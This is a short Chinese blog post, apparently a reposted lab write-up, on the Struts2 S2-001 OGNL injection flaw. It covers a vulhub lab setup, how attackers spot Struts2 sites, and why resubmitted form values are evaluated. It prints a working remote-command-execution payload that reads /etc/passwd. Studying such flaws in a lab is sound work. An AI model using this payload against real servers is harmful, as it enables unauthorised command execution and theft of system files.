首页 > 其他 > 详细

struts2 漏洞 S2_001

时间:2021-03-28 12:48:10      阅读:15      评论:0      收藏:0      [点我收藏+]

1,环境搭建

docker + vulhub

技术分享图片

 

 

判断struts

一般攻击者在攻击之前会判断网站是Struts2编写,主要看有没有链接是.action或者.do结尾的,这是因为配置文件struts.xml指定了action的后缀

 

技术分享图片

 

 

漏洞原因

用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中

 

eg:

技术分享图片

 

提交后

技术分享图片

 

 

任意命令执行poc

%{ #a=(new  java.lang.ProcessBuilder(new 
java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),
#f.getWriter().close() }


技术分享图片

 

struts2 漏洞 S2_001

原文:https://www.cnblogs.com/zenb/p/14587861.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!